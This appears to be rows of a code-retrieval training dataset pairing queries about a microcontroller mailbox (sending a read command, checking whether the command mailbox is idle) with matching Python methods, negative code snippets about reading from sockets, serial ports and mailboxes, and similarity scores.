[ "0.6980138", "0.68226683", "0.6813809", "0.6756463", "0.66383994", "0.6596419", "0.6563577", "0.6360743", "0.6337061", "0.63311714", "0.6312822", "0.6311199", "0.62932336", "0.6277489", "0.6255314", "0.6235374", "0.62292373", "0.6213919", "0.62082815", "0.6193863", "0.61861074", "0.6169357", "0.61666536", "0.6164507", "0.6145252", "0.61371475", "0.61355793", "0.6133337", "0.61246514", "0.6119756", "0.61192393", "0.6085713", "0.60368085", "0.603445", "0.603445", "0.60308295", "0.6030624", "0.601454", "0.60126233", "0.60118204", "0.60085905", "0.59987336", "0.5996809", "0.59947985", "0.5991831", "0.5959241", "0.5947794", "0.594416", "0.5939276", "0.593598", "0.5920535", "0.5920052", "0.5920028", "0.5919447", "0.59187657", "0.590682", "0.5889928", "0.58744997", "0.5872558", "0.5851791", "0.5850621", "0.58423513", "0.5840391", "0.5836903", "0.58317685", "0.5823548", "0.58233786", "0.5808959", "0.5807102", "0.5806321", "0.58033466", "0.58014166", "0.5800659", "0.57897604", "0.57830626", "0.5777785", "0.57732165", "0.57567894", "0.5742988", "0.5740192", "0.5735888", "0.5729403", "0.5725849", "0.5722809", "0.57205963", "0.57175195", "0.5717417", "0.5717417", "0.5709849", "0.5706409", "0.5690541", "0.5684075", "0.5667778", "0.5659994", "0.5659994", "0.5659994", "0.56582975", "0.5652002", "0.565094", "0.5648092" ]
0.646782
7
Send a read command to the mailbox.
def read_cmd(self, address, d_width=4, d_length=1, timeout=10):
    # Write the address
    self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_ADDR_OFFSET, address)

    # Build the read command
    cmd_word = get_cmd_word(READ_CMD, d_width, d_length)
    self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, cmd_word)

    # Wait for ACK in steps of 1ms
    countdown = timeout
    while not self.is_cmd_mailbox_idle() and countdown > 0:
        time.sleep(0.001)
        countdown -= 1

    # If ACK is not received, alert users.
    if countdown == 0:
        raise RuntimeError("ArduinoDevMode read_cmd() not acknowledged.")

    result = self.microblaze.read(MAILBOX_OFFSET + MAILBOX_PY2IOP_DATA_OFFSET)
    return result
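Usage note: a minimal, hypothetical sketch of how read_cmd above might be called; the ArduinoDevMode wrapper name, the address value, and the surrounding setup are assumptions for illustration, not part of this record.

    # Hypothetical usage -- the wrapper object and the address are assumed.
    dev = ArduinoDevMode()          # assumed wrapper exposing read_cmd()
    word = dev.read_cmd(0x2000)     # read one 4-byte word at this address
    print(hex(word))                # value fetched from the mailbox data slot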
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read(self):\n if self.status == 'read':\n return\n self.status = 'read'\n self.emit('read')\n self.emit('modified')", "def read(self, read):\n\n self._read = read", "def mifare_read(self,address):\n return self.in_data_exchange(bytearray([MIFARE_COMMAND_READ,address]))", "def read(self, request, *args, **kwargs):\n message = self.get_object()\n # Skip reading / unreading own messages\n if request.user.id != message.user_id:\n if request.method == 'POST':\n message.mark_as_read(request.user)\n elif request.method == 'DELETE':\n message.mark_as_unread(request.user)\n return Response(status=status.HTTP_202_ACCEPTED)", "def send_read_request(self, start_position):\n\tsend_data = struct.pack(\"!6I\", 0b1101, 0b0001, self.epoch_no, self.handle_no, start_position, self.NUM_BYTES_TO_READ)\n\tself.client_socket.sendto(send_data, self.address)\t\n\treturn", "def read():\n print(command(\"R\"))", "async def Read(self) -> Optional[Message]:\n return await self._read_queue.Get()", "def read(self, request, *args, **kwargs):\n conversation = self.get_object()\n if request.method == 'POST':\n conversation.mark_as_read(request.user)\n elif request.method == 'DELETE':\n conversation.mark_as_unread(request.user)\n return Response(status=status.HTTP_202_ACCEPTED)", "def doRead(self):\n if self.read_scheduled is not None:\n if not self.read_scheduled.called:\n self.read_scheduled.cancel()\n self.read_scheduled = None\n\n while True:\n if self.factory is None: # disconnected\n return\n\n events = self.socket_get(constants.EVENTS)\n\n if (events & constants.POLLIN) != constants.POLLIN:\n return\n\n try:\n message = self._readMultipart()\n except error.ZMQError as e:\n if e.errno == constants.EAGAIN:\n continue\n\n raise e\n\n log.callWithLogger(self, self.messageReceived, message)", "def receive(self, message_length=100):\n\n if self._inchild:\n return os.read(self._general_pr_child, message_length)\n else:\n return os.read(self._general_pr_parent, message_length)", "def run(self):\n\n if (self.action == 'read'):\n self.read()\n else:\n self.write()", "def test_get_message_read(self):\n message = mommy.make(\n 'connectmessages.Message', thread=self.thread, sender=self.sender)\n user_thread = UserThread.objects.get(\n thread=self.thread, user=self.user)\n user_thread.read = True\n user_thread.save()\n thread = Thread.public.by_user(user=self.user)[0]\n messages = thread.messages_for_user(self.user)\n self.assertEqual(messages[0], message)\n self.assertTrue(messages[0].read)", "def msg_chan_read(channel, version = NATIVE_HEADER_VERSION, order=\"<\"):\n return message_with_reply(CHAN_READ, channel, \"\", version, order)", "def read(self, cmd):\n return self.device.query(cmd).rstrip(\"\\n\")", "async def send_command_and_read_reply(self, command: Protocol1Command) -> str:\n command.target_pump_num = self.address\n return await self.pump_io.write_and_read_reply_async(command)", "def send_command(self, data, read_delay=1):\n self._write(data)\n if read_delay:\n time.sleep(read_delay)\n return self._read()", "def recv(self, timeout=None):\n raise NotImplementedError(\"Trying to read from a write only bus?\")", "def read(self):\n return self.rpc.call(MsfRpcMethod.ConsoleRead, [self.cid])", "def read(self, n):\n msg = self.readexactly(n)\n n2 = n - len(msg)\n if n2 > 0:\n msg += self.readbuf(n2)\n return msg", "def receive_command(self):\n if self.serial.is_open:\n return self.serial.read(999).decode('utf-8')\n self.serial.flush()", "def test_toread_command(self):\r\n bm = BmarkMock()\r\n updated = 
ToRead.run(bm)\r\n self.assertTrue(\r\n 'toread' in updated.tags,\r\n \"Updated bmark should have 'toread' tag set\")", "def test_toread_in_commandset(self):\r\n COMMANDLIST['!toread'] = ToRead\r\n\r\n bm = BmarkMock()\r\n bm.tags['!toread'] = True\r\n commander = Commander(bm)\r\n updated = commander.process()\r\n\r\n self.assertTrue(\r\n 'toread' in updated.tags,\r\n \"Should have the toread tag in the updated bookmark\")\r\n self.assertTrue(\r\n '!toread' not in updated.tags,\r\n \"Should not have the !toread tag in the updated bookmark\")", "def read(self,count=None, ser = None):\n from time import time\n ##debug(\"read count=%r,ser=%r\" % (count,ser))\n if ser is None:\n ser = self.ser\n if ser is not None:\n #print(\"in wait:\" + str(self.ser.inWaiting()))\n debug(\"Trying to read %r bytes from %s...\" % (count,ser.name))\n ser.timeout = self.timeout\n reply = ser.read(count)\n debug(\"%s: Read %r\" % (ser.name,reply))\n self.last_reply_time = time()\n else: reply = \"\"\n return reply", "def get(self, cmd, wait_sleep=0.3) -> bytes:\n logger.debug(f\"get(cmd={cmd}, wait_sleep={wait_sleep})\")\n self.write(cmd)\n result = self.read(wait_sleep=wait_sleep)\n return result", "def read(self):\n from x84.bbs import getch\n from x84.bbs.session import getsession\n from x84.bbs.output import echo\n session = getsession()\n self._quit = False\n echo(self.refresh())\n while not self.quit:\n echo(self.process_keystroke(getch()))", "def _read(self):\n if not self.connected:\n raise IOError(\"Not connected.\")\n\n try:\n with self._read_lock:\n if not self.connected:\n raise IOError(\"Not connected.\")\n data = self._reader.readline(self.MAX_MESSAGE_SIZE)\n # If there weren't a \"\\r\\n\" between the last message\n # and the EOF we would have a false positive here.\n # Luckily there is one.\n if len(data) > 0 and not data.endswith(b\"\\r\\n\"):\n logger.error(\n \"The client sent a message larger than %d bytes (that \"\n \"is MAX_MESSAGE_SIZE). 
Consider raising that value if \"\n \"the message seemed legit.\", self.MAX_MESSAGE_SIZE)\n self.finalize(\"Client misbehaving.\")\n raise IOError(\"Message too long.\")\n except socket.error as error:\n if self.connected:\n logger.warning(\"Failed reading from socket: %s.\", error)\n self.finalize(\"Read failed.\")\n raise error\n else:\n # The client was terminated willingly; its correct termination\n # is handled in disconnect(), so here we can just return.\n return b\"\"\n\n return data", "def readMail(m, msgNum):#Read a particular email\n resp, data = m.fetch(msgNum, \"(RFC822)\")\n email_body = data[0][1]\n mail = email.message_from_string(email_body)\n #temp = m.store(emailid,'+FLAGS', '\\\\Seen')\n m.expunge()\n\n\n return mail", "def query(self, command):\r\n self.ser_io.write(command+'\\r')\r\n return self.ser_io.readline()", "def trigger_item_read(self, checked):\n if self.selected_item and checked == self.selected_item.unread:\n if self.selected_item.unread:\n self.selected_item.mark_as_read()\n else:\n self.selected_item.mark_as_unread()\n self.controller.item_read(self.selected_item)", "def test_isread_command(self):\r\n bm = BmarkMock()\r\n bm.tags['toread'] = True\r\n updated = IsRead.run(bm)\r\n self.assertTrue(\r\n 'toread' not in updated.tags,\r\n \"Updated bmark should not have 'toread' tag set\")", "async def _read_reply_async(self) -> str:\n reply_string = await self._serial.readline_async()\n logger.debug(f\"Reply received: {reply_string}\")\n return reply_string.decode(\"ascii\")", "def handle_read(self):\n packet = self.recv(8192)\n if packet == \"\":\n #print \"[WARNING] Socket closed by remote host %s:%s\" % (\n # self.address,self.port)\n self.close()\n return\n packet_list = messages.separate_messages(packet)\n #received_types = \" + \".join(\n # messages.get_message_type(messages.parse(packet))\n # for packet in packet_list)\n #print \"From %s:%s received: \" % (self.address, self.port), received_types\n # Process a single message at a time\n for packet in packet_list:\n message = messages.parse(packet)\n if messages.get_message_type(message) == \"OFPT_ECHO_REQUEST\":\n self.buffer.append(messages.of_echo_reply)\n else:\n self.handle_message(message)", "def read(self):\r\n assert self.status in (WAIT_LEN, WAIT_MESSAGE)\r\n if self.status == WAIT_LEN:\r\n self._read_len()\r\n # go back to the main loop here for simplicity instead of\r\n # falling through, even though there is a good chance that\r\n # the message is already available\r\n elif self.status == WAIT_MESSAGE:\r\n read = self.socket.recv(self.len - len(self.message))\r\n if len(read) == 0:\r\n logging.error(\"can't read frame from socket (get %d of %d bytes)\" %\r\n (len(self.message), self.len))\r\n self.close()\r\n return\r\n self.message += read\r\n if len(self.message) == self.len:\r\n self.status = WAIT_PROCESS", "def read():\n # TODO", "def read(self, length=1024):\n\n return self.socket.recv(length)", "def inReadEvent(self):\r\n try:\r\n self._checkAssert()\r\n if self.handshaker:\r\n self._doHandshakeOp()\r\n elif self.closer:\r\n self._doCloseOp()\r\n elif self.reader:\r\n self._doReadOp()\r\n elif self.writer:\r\n self._doWriteOp()\r\n else:\r\n self.reader = self.tlsConnection.readAsync(16384)\r\n self._doReadOp()\r\n except:\r\n self._clear()\r\n raise", "def read(self, length = 1024):\n\n return self.socket.recv(length)", "def read(self, length = 1024):\n\n return self.socket.recv(length)", "def read(self):\n assert self.status in (WAIT_LEN, WAIT_MESSAGE)\n\n if self.status == WAIT_LEN:\n 
self._read_len()\n # go back to the main loop here for simplicity instead of\n # falling through, even though there is a good chance that\n # the message is already available\n elif self.status == WAIT_MESSAGE:\n read = self.socket.recv(self.len - len(self.message))\n if len(read) == 0:\n logging.error(\"can't read frame from socket\" +\n \" (got %d of %d bytes)\" %\n (len(self.message), self.len))\n self.close()\n return\n self.message += read\n if len(self.message) == self.len:\n self._set_status(WAIT_PROCESS)", "async def read(self, *, decode: bool = ...) -> bytes:\n ...", "def _rc_get(self, cmd, buffersize=0):\n if not cmd.endswith('\\n'):\n cmd = cmd + '\\n'\n cmd = cmd.encode()\n self.SOCK.sendall(cmd)\n # allways read at least 2 bytes!\n answer = self.SOCK.recv(buffersize + 2)\n return answer.decode('utf-8').split('\\r\\n> ')[0]", "def on_read(conn, message):\n body = json.loads(message.body)\n print('Read received', body)\n with Producer(conn) as producer:\n try:\n value = db_read(body['key'])\n print('Db read', body['key'], value)\n producer.publish(\n {'result': value},\n exchange='',\n routing_key=message.properties['reply_to'],\n correlation_id=message.properties['correlation_id'],\n serializer='json',\n retry=True)\n finally:\n message.ack()", "def read(self, *args, **kwargs):\n return self.limitedstream.read(*args, **kwargs)", "def query(self):\n self.bus.write('@\\x51\\r\\n')\n response = self.bus.read(23)\n return response", "def read_pipe(self, read_data):\n self.logger.info(read_data)", "async def read(self,\n n: int = -1\n ) -> bytes:\n if n == 0:\n return b''\n\n future = asyncio.Future()\n try:\n self._read_queue.put_nowait((future, False, n))\n return await future\n\n except aio.QueueClosedError:\n raise ConnectionError()", "def ask(self, command, query_delay=0):\n self.write(command)\n self.wait_for(query_delay)\n return self.read()", "def ask(self, message):\n\n self.write(message)\n\n if self.multi_command is None:\n return self.read()\n else:\n self.responses_expected += 1", "def is_raw_read(command): \n if command.startswith('<READ') and command.endswith('>') and \\\n is_valid_raw(command):\n return True\n else: \n return False\n # end if", "def select(self, path, rw=True):\n return self._getMailbox(path)", "def _on_read(self, line):\n # Some game logic (or magic)\n line = line.strip()\n logger.info(\"RCV> %s\", line)\n if not line:\n self.stream.close()\n return\n\n self.stream.write(\"echo: %s\\n\" % line)\n\n # Wait for further input on this connection\n self.wait()", "def doRead(self):\n return fdesc.readFromFD(self.fileno(), self.protocol.dataReceived)", "def read(self, *args, **kwargs):\n pass", "def wait_till_read_out():\n\n\trespond = send_command('waitreadout')", "def read(self):\n self.attributes = self.call('READ', expect=error.OK)", "def send(self, jlink):\n ack = super(ReadRequest, self).send(jlink)\n\n # Write the read command, then read the data and status.\n jlink.swd_write32(0x0, 0x0)\n jlink.swd_write8(0xFC, 0x0)\n status = jlink.swd_read8(ack) & 7\n data = jlink.swd_read32(ack + 3)\n\n if status == Response.STATUS_ACK:\n # Check the parity\n parity = jlink.swd_read8(ack + 35) & 1\n if util.calculate_parity(data) != parity:\n return Response(-1, data)\n\n return Response(status, data)", "def select(self, path, rw=False):\n return self._getMailbox(path)", "async def readline(self) -> bytes:\n ...", "def read(fd, name, *args, version=None, **kwargs):\n\treturn access('read', fd, name, *args, version=version, **kwargs)", "def read(self, size=None, 
timeout_ms=None, **kwargs):\n raise NotImplementedError(\"implement in derived transport class\")", "def read(self, len, timeout = 0):\n if timeout < 0:\n timeout = 0\n else:\n timeout += _timeout\n\n try:\n return self._snc.read(len, timeout)\n except Exception as e:\n log.error(\"failed to read [len={0}]:\\n{1!r}\" .\n format(len, e))\n raise Error", "def startReading(self):\n self.reading = True\n self.thread = ReadSocket(self)\n self.thread.start()", "def query(self,command = None,count=1,ser = None):\n from time import time\n from time import sleep\n if ser is None:\n ser = self.ser\n\n if ser is not None:\n t1 = time()\n self.write(command)\n i = 0\n while self.waiting(ser)[0] != count:\n if i >int(self.timeout/0.015):\n break\n sleep(0.015)\n i+=1\n reply = self.read(ser = ser,count=count)\n t2 = time()\n self.last_command_execution_time = t2-t1\n self.last_reply_time = time()\n else:\n reply = ''\n return reply", "def execute_read(function):\n raise NotImplementedError(\"execute_read() has not been implemented\")", "async def read(self, adr):\n await self.busy.acquire()\n \n if not self.is_reset:\n await self.reset_ev.wait()\n self.reset_ev.clear()\n \n self._access_req(adr, 0, 0, 0)\n \n await self.ack_ev.wait()\n self.ack_ev.clear()\n \n self.busy.release()\n \n return self.dat_i", "def read(self, command):\n return self.meas.read(command)", "async def exec_read(self, query, *args, only_one=False):", "def read(self, nbytes: int, write: int = 0x00, /) -> bytes:", "def read(self, nbytes: int, write: int = 0x00, /) -> bytes:", "async def read(self, n: int) -> bytes:\n await self.wait_for_read()\n try:\n return self.socket.recv(n)\n except ConnectionResetError:\n self.logger.debug(\"Connection reset\")\n raise asyncio.TimeoutError", "def _send_command(self, command):\n command = \"%s\\n\" % (command.strip())\n self.server.write(command)\n self.server.flush()\n\n #read the length of the result\n length = int(self.server.readline())\n output = self.server.read(length)\n\n result = pickle.loads(output)\n if result[0] == 'ok':\n return result[1]\n else:\n raise RobotCommandError(str(result))", "def receiveMessage(self,size):\n self.messageReceived = self.com.getData(size)\n print('+--------------------------------+')\n print('| Mensagem Recebida |')\n print('+--------------------------------+')\n print(self.messageReceived)", "def _recv(self):\n return self._channel.recv(_MAX_READ_AMOUNT)", "def read(self, count):\n d = self.sock.recv(count, socket.MSG_WAITALL)\n assert len(d) == count\n return d", "def read(self, **kwargs):\n pass", "def read(self, delay, cmd):\n \n buf = []\n seeking_sync = True;\n seeking_end = True;\n\n time.sleep(delay)\n # Read serial into buffer and then pop out to s for return\n while self.ser.inWaiting() > 0:\n ch = self.ser.read(1) #Read 1 BYTE\n \n if seeking_sync:\n if ch == chr(2): # <STX>\n seeking_sync = False\n elif seeking_end:\n if ch == chr(6): # <ACK>\n buf.append(chr(6))\n seeking_end = False\n else:\n buf.append(ch)\n \n ### These checks should be moved to send like the other serial classes\n if not buf: # No reply received\n debugRow = 'arduinoSerial:: Sent_Cmd: ' + cmd + ' No reply!'\n self.dbF.writerow([debugRow])\n if DEBUG: print debugRow\n return False\n elif buf[-1] != chr(6): # Check for ACK character\n debugRow = 'arduinoSerial:: Sent_Cmd: ' + cmd + ' ACK not found!'\n self.dbF.writerow([debugRow])\n if DEBUG: print debugRow\n return False \n else:\n cmd = buf[0] # First entry is command\n # Comma separated data stored in list\n data = 
''.join(buf[1:-1]).split(',') \n return cmd, data", "def make_read_request(file_offset=1, byte_count=MAX_READ):\n return StenoPacket(\n packet_id=StenoPacket.ID_READ,\n p1=file_offset,\n p2=byte_count,\n )", "def mark_messages_read(self, mbox, msgset):\n self._add_flag(mbox, msgset, r'(\\Seen)')", "def read(self, n):\n assert self._read_future is None, \"Concurrent reads detected\"\n\n read_future = Future(self._loop)\n\n if self._unread_bytes or self._eof_recvd:\n read_future.set_result(self._unread_bytes)\n self._unread_bytes = b''\n else:\n self._read_future = read_future\n def read_future_done(_):\n self._read_future = None\n read_future.add_done_callback(read_future_done)\n\n return read_future", "async def _read(self, n):\n return await self._reader.readexactly(n)", "def read(self):\n return self.block.read()", "def run(self):\n self.read_from_serial()", "def _get_data(self, read_size):\n if NIX:\n return super(Keyboard, self)._get_data(read_size)\n return self._pipe.recv_bytes()", "def read(self, msg, ans_len):\n self.write(msg)\n # Length is sum of header(2), length, check, cmd, ans_len and end\n length = 6 + ans_len\n ans = self.sock.recv(length)\n if self.__check(ans):\n return ans[4:-2]\n return None", "def read(self, client):\n log(\"Reading from %s\" % self, self.opt)\n return client.read(self.path)", "def Read(self, *args, **kwargs):\n pass", "def stdin_read(self, data):\n self.write_master(data)", "def _execute(self, message):\n logging.info(__name__ + ' : Send the following command to the device: %s' % message)\n self.visa_handle.write('@%s%s' % (self._number, message))\n sleep(70e-3) # wait for the device to be able to respond\n result = self._read()\n if result.find('?') >= 0:\n print(\"Error: Command %s not recognized\" % message)\n else:\n return result", "def read(self, command):\n return self.meas.read(command)", "def read(self, command):\n return self.meas.read(command)", "def handle_read(self):\n while True:\n try:\n content = self.recv(1024)\n if content:\n self.rbuf.write(content.decode('utf-8'))\n if len(content) < 1024:\n break\n except Exception as e:\n print(e)\n self.handle_rpc()", "def read(self):\n pass", "def pub_serial_read():\n pub = rospy.Publisher('serial_reader', String, queue_size=10)\n while not rospy.is_shutdown():\n recv=serial_read(useParse=True)\n if recv != '':\n rospy.loginfo(recv)\n pub.publish(recv)\n else:\n pass\n print 'Closing...'", "def get(self, id):\n return read_msg(id)", "def _get_data(self, read_size):\n return self._character_device.read(read_size)", "def send(self, message):\n if not hasattr(message, '__iter__'):\n self.socket.send(message, constants.NOBLOCK)\n else:\n for m in message[:-1]:\n self.socket.send(m, constants.NOBLOCK | constants.SNDMORE)\n self.socket.send(message[-1], constants.NOBLOCK)\n\n if self.read_scheduled is None:\n self.read_scheduled = reactor.callLater(0, self.doRead)", "def read(self, bytes_to_receive=512, **kwargs):\n who_send = kwargs.get(\"who_send\", None)\n data = None\n if(self._type_connection == \"COM\"):\n data = self._connection.read(bytes_to_receive)\n else:\n msg = \"99, Error al recibir por la conexion {}\".format(self._type_connection)\n raise ValueError(msg)\n\n transa_log(data, is_hexa_data=True, who_send=who_send)\n return data", "def read_buffer(self):\n message=self._message\n return message", "def _read(self, register):\n\n assert register in _registers, 'Not a valid register. 
Register must be passed as string.'\n\n # send read command to register\n self.spi.writebytes([READ | _registers[register]])\n\n # return values in register\n return self.spi.readbytes(_register_len[register])", "def _receive(self, length):\n \n return self.device.read(length)" ]
[ "0.6737285", "0.65308905", "0.6498505", "0.64222383", "0.63628715", "0.6303914", "0.62050015", "0.6119331", "0.6107073", "0.60777915", "0.6036015", "0.6027135", "0.6019354", "0.5988685", "0.5962931", "0.594067", "0.59229904", "0.5910504", "0.5862011", "0.58523464", "0.5848433", "0.58402604", "0.5828221", "0.5795775", "0.5790745", "0.57674503", "0.5743325", "0.57335556", "0.57302314", "0.57141423", "0.57037383", "0.5688567", "0.568855", "0.5679042", "0.5665188", "0.5663409", "0.5661996", "0.5661996", "0.5636364", "0.5635549", "0.56252885", "0.5607194", "0.5585722", "0.55782753", "0.55618113", "0.55592877", "0.5555569", "0.5548811", "0.55314785", "0.5528288", "0.55278355", "0.551739", "0.5515901", "0.5512189", "0.5501935", "0.5493278", "0.54906017", "0.54897064", "0.5486148", "0.54747844", "0.54688966", "0.5459737", "0.54568547", "0.54469675", "0.5437859", "0.54224074", "0.54196095", "0.54173535", "0.54173535", "0.5411812", "0.5407126", "0.5403474", "0.5402293", "0.5399192", "0.5394842", "0.5393302", "0.53931874", "0.53897536", "0.5382663", "0.53799224", "0.5379772", "0.5377371", "0.5366614", "0.5364253", "0.5363836", "0.53620005", "0.5357784", "0.5357142", "0.53408074", "0.53408074", "0.53364664", "0.53356403", "0.5331873", "0.5323142", "0.53220254", "0.5321833", "0.5316188", "0.5308663", "0.53060293", "0.53022116" ]
0.6479234
3
Check whether the command mailbox is idle. Returns bool: True if the command in the mailbox is idle.
def is_cmd_mailbox_idle(self):
    mb_cmd_word = self.microblaze.read(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET)
    return (mb_cmd_word & 0x1) == 0
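Usage note: a short sketch of the polling pattern this idle check enables; the wait_for_mailbox helper is hypothetical, and the 1 ms step simply mirrors the read_cmd record above.

    import time

    def wait_for_mailbox(dev, timeout_ms=10):
        # Poll the command mailbox in 1 ms steps until it reports idle
        # or the timeout expires; returns True when the mailbox is idle.
        for _ in range(timeout_ms):
            if dev.is_cmd_mailbox_idle():
                return True
            time.sleep(0.001)
        return False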
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def is_idle(self) -> bool:\n return (\n await self.send_command_and_read_reply(Protocol1Command(command=\"F\")) == \"Y\"\n )", "def is_idle(self) -> bool:\n\n return self.get_runningstate == self.cmd.C815_IDLE_STATE", "def is_idle(self) -> bool:", "def is_idle(self) -> bool:\n\n return self.send(self.cmd.GET_GLOBALSTATUS_RUNNING) is False", "def is_idle(self) -> bool:\n raise NotImplementedError() # pragma: nocover", "def is_busy(self) -> bool:\n return self.__interface.read_pin(self.__interface.BUSY_PIN) == 0 # 0: busy, 1: idle.", "def _isInIdle(self):\r\n if core.FW_conf['blackbox'].isVideoRecorderAvailable() and core.FW_conf['blackbox'].videoClient.GetCurrentState() == 'idle':\r\n self.inIdle = True\r\n return True\r\n else:\r\n return False", "def __is_active(self, command):\n return True", "def still_active(pid: int, cmd: str) -> bool:\n os_cmd = get_command_for_pid(pid)\n return cmd in os_cmd", "def is_idle(self) -> bool:\n return not self.orders", "def is_idle(self):\n idle = len(self.__tasks) == 0, self.__queue.qsize() == 0\n return collections.namedtuple('TaskletIdle', ['tasklet', 'worker'])(*idle)", "async def wait_until_idle(self):\n logger.debug(f\"ML600 pump {self.name} wait until idle...\")\n while not self.is_idle():\n await asyncio.sleep(0.1)\n logger.debug(f\"...ML600 pump {self.name} idle now!\")", "def check_command(self):\n return self.process is not None and self.process.poll() is None", "def should_poll(self):\n return self._command_state is not None", "def is_busy(self):\n cons = self.rpc.call(MsfRpcMethod.ConsoleList)['consoles']\n for c in cons:\n if c['id'] == self.cid:\n return c['busy']", "def is_active(self):\n with self._lock:\n return self._robot is not None", "def is_blocked(self, idle_time = 2.0):\n return time.time() - self._last_update > idle_time", "def is_active(self):\n for unit in self.units:\n if unit.is_alive():\n return True\n return False", "def _CheckForIdleQuit(self):\n timeout = time.time() + self.idle_timeout_secs\n while time.time() < timeout:\n if self._shutdown_requested_event.is_set():\n # An external source called shutdown()\n return\n elif self._rpc_received_event.is_set():\n logging.debug('Resetting the idle timeout')\n timeout = time.time() + self.idle_timeout_secs\n self._rpc_received_event.clear()\n time.sleep(1)\n # We timed out, kill the server\n logging.warning('Shutting down the server due to the idle timeout')\n self.shutdown()", "def check( self ):\n\n if ( self.alive is not None ) \\\n and ( time.time() > ( self.alive + self.timeout ) ):\n return False\n return True", "def is_alive(self):\n self.ssh.sendline(\"clear\")\n return self.ssh.prompt()", "def isBusy(self):\n return self.busy", "def idle_check(self):\n result = []\n LOG.info('Idle check...')\n to_deactivate = self.manager.idle()\n with LOCK:\n for ctx in to_deactivate:\n LOG.info('removing idle chatstate %s', ctx.chat_id)\n self.manager.remove_chat_context(ctx)\n result.append(ctx)\n return result", "async def locked(self):\n return not \"not\" in await self.ask(\"locked\")", "def wait_until_idle(self):\n while True:\n time.sleep(self.__interface.WT_STATE_LOOKUP)\n\n if not self.is_busy:\n break", "def is_in_cmd(self):\r\n return self.select_cmd is not None", "def HasPendingCommands(self):\n\t\n return self.queue.qsize() > 0", "def isActive(self):\n return self._timerID is not None", "def is_in_terminal(self):\n return self._current_state is None", "def responds_to(self, command) -> bool:\n return command == self.command and self.active is True and 
self.command is not None", "def is_active(self):\n now = self.sim.now\n return (now < self.stop) and (self._number < self.max_length) \\\n and (now >= self.start)", "def busy(self) -> bool:\n return self._busy", "def GoToIdle(self):\n \n command = self.get_command_object(\"GoToIdle\")\n (return_code, message) = command()\n return [[return_code], [message]]", "def shooting(self):\r\n return not self.stopped", "def is_locked(self):\n now = get_current_time()\n if self.end <= now:\n return True\n return False", "def is_alive(self):\n return not (self._find.is_alive() or \n self._sum.is_alive() or\n self._tag.is_alive() or \n self._register.is_alive() or\n self._dispatcher.is_alive())", "def is_scheduled(self) -> bool:\n return not self.terminated and self.__state != Process.IDLE", "def inactive(self):\n return time.time() - self.last_activity > self._timeout", "def is_locked(self):\n return self._unit_got == False", "def _iswaiting(self):\n return self._ison() or self._isstandby()", "def is_alive(self):\n return (self.read_name() != '')", "def schedule_required(self) -> bool:\n return self._local.idle", "def status_callback():\n if args['retire_idle']:\n return False\n\n return True", "async def _check_idle_status(self, page: Page) -> None:\r\n # check that page has not been removed and page is not idle.\r\n if page in self.pages and not self.pages[page]['is_idle']:\r\n # check how long page has not been idle.\r\n t_since_idle = datetime.now() - self.pages[page]['time_last_idle']\r\n # check if user provided idle timout. If not, set it to 5 mins.\r\n idle_timeout = self.browsers[page.browser]['launch_options'].get(\r\n 'pageIdleTimeout', 60*5)\r\n if t_since_idle.seconds >= idle_timeout:\r\n logger.error(\r\n f\"\"\"Page {self.pages[page]['id']} has not been set idle in {str(t_since_idle)}.\r\n Assuming client side crash. 
Adding page to idle queue.\"\"\")\r\n # set page idle so a functioning client side task can use it.\r\n await self.set_idle(page)\r\n # check page's idle status again in about another minute.\r\n await asyncio.sleep(60)\r\n asyncio.create_task(\r\n self._check_idle_status(page))", "def check_event_channel(ctx: commands.Context) -> bool:\n if get_active_feature(ctx.channel) != ActivationState.EVENT:\n raise error_handling.InactiveChannelError()\n else:\n return True", "def is_active(self):\n LOGGER.debug('Set %d is_active check state %s', self.port_set, self.state)\n return self.state != _STATE.ERROR and self.state != _STATE.DONE", "def is_alive(self):\n if self.status == 1:\n return True\n else:\n return False", "def is_active(self):\n with self._lock:\n return self._termination_manager.is_active()", "def is_active(self):\n return self.stream.is_active()", "def is_active(self) -> bool:\n return self._stream.active", "def idleState(self, tick):\n assert (self.mState == self.States.Idle)\n\n \"\"\" If the message queue isn't empty \"\"\"\n if len(self.mMessageQueue) != 0:\n self.mBackoffIteration = 0\n self.mState = self.States.Sensing", "def is_alive(self) -> bool:\n\n\n try:\n self.sock.settimeout(2)\n except OSError:\n\n return False\n\n try:\n self.talk('/system/identity/print')\n\n except (socket.timeout, IndexError, BrokenPipeError):\n\n self.close()\n return False\n\n self.sock.settimeout(None)\n return True", "def active(self):\n return self.server.is_active() or self.executing", "def poll(self):\n _check_init()\n self._check_open()\n\n result = self._input.Poll()\n if result == _pypm.TRUE:\n return True\n\n if result == _pypm.FALSE:\n return False\n\n err_text = _pypm.GetErrorText(result)\n raise MidiException((result, err_text))", "def assumed_state(self):\n return self._command_state is False", "def is_locked(self) -> bool:\n return bool(self._node.status)", "def can_play_on_all_active(self):\n if self.last_move is None:\n return True\n x, y = self.last_move[-2:]\n if self.boards[x][y].state != State.IN_PROGRESS:\n return True\n return False", "def check_finish(self):\r\n return not self.proc.is_alive()", "def fan_timer_active(self) -> bool:\r\n self._logger.debug(log_message_formatter(\r\n \"get\", f\"{self}\", \"fan_timer_active\"))\r\n return datetime.fromisoformat(self.fan_timer_timeout) > datetime.now()", "def _idle_space(self, bucket: dict):\n date_manager = ressource_date_manager(created_at=bucket['CreationDate'])\n return date_manager.is_idle(self.RSRC_TIMEOUT)", "def active(self) -> bool:\n return self.relay(\"active\")", "def is_active(self):\n\t\tself.stream.is_active()", "def is_active(self):\n with settings(hide('running', 'stdout', 'stderr', 'warnings'), warn_only=True):\n return self._action('is-active').succeeded", "def ignore_idle_slots(self) -> pulumi.Output[bool]:\n return pulumi.get(self, \"ignore_idle_slots\")", "def active(self):\n return self in manager.handler", "def ignore_idle_slots(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_idle_slots\")", "def active(self):\n resp = self.server.request(\"get\", \"/jobs/%s/%s/state\" % (\n self.sessionid, self.name))\n if resp.body == b'1':\n return True\n return False", "def is_active(self, channel):\n return bool(int(self.bus.ask('sel:%s?' 
